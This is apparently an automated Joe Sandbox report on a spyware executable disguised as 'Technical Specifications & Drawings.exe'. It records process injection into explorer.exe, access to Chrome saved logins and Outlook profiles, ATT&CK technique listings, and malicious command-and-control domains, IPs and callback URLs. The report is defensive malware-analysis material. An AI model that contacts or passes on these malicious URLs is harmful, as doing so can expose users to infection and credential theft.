          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match; File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\control.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\control.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          Source: Yara match; File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: 1 Shared Modules; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: 612 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 612 Process Injection; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 13 Software Packing; 1 File Deletion
          Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: 121 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Remote System Discovery; 13 System Information Discovery; System Owner/User Discovery; Network Sniffing; Network Service Scanning
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
          [Behavior graph: ID 680337; Sample: Technical Specifications & ...; Startdate: 08/08/2022; Architecture: WINDOWS; Score: 100. Process chain: Technical Specifications & Drawings.exe (started) -> Technical Specifications & Drawings.exe (started) -> explorer.exe (injected) -> control.exe (started)]

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | Technical Specifications & Drawings.exe | 32% | Virustotal | |
          | Technical Specifications & Drawings.exe | 22% | ReversingLabs | ByteCode-MSIL.Spyware.Noon |
          | Technical Specifications & Drawings.exe | 100% | Joe Sandbox ML | |

          No Antivirus matches

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 4.0.Technical Specifications & Drawings.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | boshi-eg.online | 12% | Virustotal | |
          | mexc-event-partner.site | 6% | Virustotal | |

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
          | http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ | 100% | Avira URL Cloud | malware |
          | http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ | 100% | Avira URL Cloud | malware |
          | http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ | 100% | Avira URL Cloud | malware |
          | http://www.tiro.com | 0% | URL Reputation | safe |
          | http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ | 100% | Avira URL Cloud | malware |
          | http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91 | 100% | Avira URL Cloud | malware |
          | http://www.goodfont.co.kr | 0% | URL Reputation | safe |
          | http://www.mexc-event-partner.site/02pi/ | 100% | Avira URL Cloud | malware |
          | http://www.carterandcone.coml | 0% | URL Reputation | safe |
          | http://www.sajatypeworks.com | 0% | URL Reputation | safe |
          | http://www.typography.netD | 0% | URL Reputation | safe |
          | www.tomoptique.fr/02pi/ | 100% | Avira URL Cloud | malware |
          | http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
          | http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
          | http://fontfabrik.com | 0% | URL Reputation | safe |
          | http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
          | http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
          | http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          | http://www.sandoll.co.kr | 0% | URL Reputation | safe |
          | http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
          | http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
          | http://www.sakkal.com | 0% | URL Reputation | safe |

          | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|---|
          | boshi-eg.online | 67.23.226.119 | true | true | | unknown |
          | tomoptique.fr | 109.234.162.62 | true | true | | unknown |
          | mexc-event-partner.site | 184.168.107.80 | true | true | | unknown |
          | www.kirchhoff-darryl.com | 107.155.208.43 | true | true | | unknown |
          | www.esandcraic.com | 67.223.117.72 | true | true | | unknown |
          | td-balancer-199-15-163-148.wixdns.net | 199.15.163.148 | true | false | | unknown |
          | www.mexc-event-partner.site | unknown | unknown | true | | unknown |
          | www.fundycases.com | unknown | unknown | true | | unknown |
          | www.gzkanglongkeji.com | unknown | unknown | true | | unknown |
          | www.boshi-eg.online | unknown | unknown | true | | unknown |
          | www.tomoptique.fr | unknown | unknown | true | | unknown |
Name | Malicious | Antivirus Detection | Reputation
http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ | true | Avira URL Cloud: malware | unknown
http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ | true | Avira URL Cloud: malware | unknown
http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ | true | Avira URL Cloud: malware | unknown
http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ | true | Avira URL Cloud: malware | unknown
http://www.mexc-event-partner.site/02pi/ | true | Avira URL Cloud: malware | unknown
www.tomoptique.fr/02pi/ | true | Avira URL Cloud: malware | low
IP | Domain | Country | ASN | ASN Name | Malicious
109.234.162.62 | tomoptique.fr | France | 50474 | O2SWITCHFR | true
107.155.208.43 | www.kirchhoff-darryl.com | United States | 4686 | BEKKOAMEBEKKOAMEINTERNETINCJP | true
67.223.117.72 | www.esandcraic.com | United States | 15189 | VIMRO-AS15189US | true
184.168.107.80 | mexc-event-partner.site | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
67.23.226.119 | boshi-eg.online | United States | 33182 | DIMENOCUS | true
                                                IP
                                                192.168.2.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 680337
Start date and time: 2022-08-08 12:26:09 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 19s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Technical Specifications & Drawings.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/2@14/6
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 93.3% (good quality ratio 81.7%)
• Quality average: 72%
• Quality standard deviation: 33.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 45
• Number of non-executed functions: 166
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
Time | Type | Description
12:27:15 | API Interceptor | 1x Sleep call for process: Technical Specifications & Drawings.exe modified
Process: C:\Users\user\Desktop\Technical Specifications & Drawings.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1308
Entropy (8bit): 5.345811588615766
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5: 2E016B886BDB8389D2DD0867BE55F87B
SHA1: 25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256: 1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512: C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious: true
Reputation: high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                Process:C:\Windows\SysWOW64\control.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.792852251086831
                                                Encrypted:false
                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.774223579181345
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Technical Specifications & Drawings.exe
                                                File size:800256
                                                MD5:9b94f751e8cc145058db9f428c2ad571
                                                SHA1:f12af989efe2b3b11e4784899ca4c6794da17879
                                                SHA256:893a0b655917a18e5886348b39f6023fa851cf3d89e5b8709219ad3d2766fa97
